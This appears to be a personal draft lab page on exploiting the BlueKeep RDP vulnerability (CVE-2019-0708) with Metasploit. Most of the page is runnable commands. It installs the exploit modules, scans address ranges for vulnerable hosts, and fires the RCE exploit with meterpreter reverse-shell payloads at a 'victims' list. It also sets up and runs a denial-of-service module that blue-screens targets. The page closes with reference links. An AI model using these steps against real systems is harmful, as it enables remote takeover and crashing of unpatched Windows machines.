BLUEKEEP

on-going draft

INTRODUCTION

Fri the 6th of Sep 2019 in the late afternoon, it was announced and published. Either keep your repo and master branch but override those

ls -l lib/msf/core/exploit/rdp.rb*
mv lib/msf/core/exploit/rdp.rb lib/msf/core/exploit/rdp.rb.old
wget -O - "https://raw.githubusercontent.com/busterb/metasploit-framework/bluekeep/lib/msf/core/exploit/rdp.rb" > lib/msf/core/exploit/rdp.rb

ls -l modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb*
mv modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb.old
wget -O - "https://raw.githubusercontent.com/busterb/metasploit-framework/bluekeep/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb" > modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

ls -l modules/auxiliary/scanner/rdp/rdp_scanner.rb*
mv modules/auxiliary/scanner/rdp/rdp_scanner.rb modules/auxiliary/scanner/rdp/rdp_scanner.rb.old
wget -O - "https://raw.githubusercontent.com/busterb/metasploit-framework/bluekeep/modules/auxiliary/scanner/rdp/rdp_scanner.rb" > modules/auxiliary/scanner/rdp/rdp_scanner.rb

#ls -l modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb*
#mv modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb.old
mkdir -p modules/exploits/windows/rdp/
wget -O - "https://raw.githubusercontent.com/busterb/metasploit-framework/bluekeep/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb" > modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

or just use busterb’s fork on the bluekeep branch. I am not sure a new sql user and database are required, but it’s probably better to do it. Anyhow the first way is better as all the non-custom payloads will be loadable from the console, while only reverse_tcp successfully loads on busterb’s.

mv metasploit-framework/ metasploit-framework.rapid7/
git clone --single-branch --branch bluekeep git://github.com/busterb/metasploit-framework.git
cd metasploit-framework/
bundle install
./msfupdate
#git checkout bluekeep
git branch

ATTACK SURFACE & PATCHES

Windows XP (all)
Windows 2003 (all)
Windows 7 SP 1 (32 and 64 bit)
  64-bit --> KB4489878
Windows Server 2008
Windows Server 2008 R2

METASPLOIT CHECK

you can do that behind a NAT

msfconsole

search bluekeep

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhosts x.x.x.x/xx
set threads 8
grep -v refused run

you should see a few of those

The target is not exploitable.

and in case there’s one of those

The target is vulnerable.

then eventually proceed with the following

METASPLOIT EXPLOIT

Now you need a directly routed IP or port forwarding for reverse shell

ping continuously that you don’t crash the remote system and be ready to nmap -p 4444,8443 from the subnet to check whether the handler is not only listening (netstat -lntup), but truly reachable

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
show advanced
set rhosts REMOTE-HOST(S)
set rhosts file:/home/msf/victims
set rhosts file:/home/msf/victims1vulnerable

show targets
#set target 0
set target 1

show payloads
set payload windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_https

set lhost YOU-REACHABLE
#set lport 4447
#set lport 443
#set forceexploit true
set -g loglevel 3
set consolelogging true
set sessionlogging true
run

no need to check as it is done by default

so far this is what I got

Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

BSoD - mekhalleh DoS

mkdir ~/bluekeep/
cd ~/bluekeep/
git clone https://github.com/mekhalleh/cve-2019-0708.git
mv cve-2019-0708 mekhalleh-dos/

cd /opt/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/bluekeep/mekhalleh-dos/cve_2019_0708_bluekeep_dos.rb ./

(re)start Metasploit

cd /opt/metasploit-framework/
msfconsole -q
search bluekeep

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep_dos

show options
set rhosts x.x.x.x
run

RESOURCES

BlueKeep https://en.wikipedia.org/wiki/BlueKeep

check

CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check https://www.rapid7.com/db/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep

Suggestion: Add module for CVE-2019-0708 #11852 https://github.com/rapid7/metasploit-framework/issues/11852

cve_2019_0708_bluekeep.md https://nest.parrotsec.org/security-tools/metasploit-framework/blob/23529c80cad1e776eb184d7694b8f42a6cd5aad4/documentation/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.md

Сканируем сеть на предмет наличия уязвимости CVE-2019-0708 (BlueKeep) с помощью модуля Metasploit и утилиты rdpscan в ОС Kali Linux 2019.2 https://blog.it-kb.ru/2019/06/13/network-scanning-for-cve-2019-0708-bluekeep-vulnerability-using-the-metasploit-module-and-rdpscan-tool-build-on-kali-linux/

bsod

mekhalleh/cve-2019-0708 https://github.com/mekhalleh/cve-2019-0708

settings

Metasploit set rhosts file http://travisaltman.com/metasploit-set-rhosts-file/

reverse shell

How to use a reverse shell in Metasploit https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit

msfcli prevents the use of custom payload modules since 4.7.1 #3704 https://github.com/rapid7/metasploit-framework/issues/3704

exploit

Initial Metasploit Exploit Module for BlueKeep (CVE-2019-0708) https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/

Add initial exploit for CVE-2019-0708, BlueKeep #12283 https://github.com/rapid7/metasploit-framework/pull/12283


Nethence | Pub | Lab | Pbraun | SNE Russia | xhtml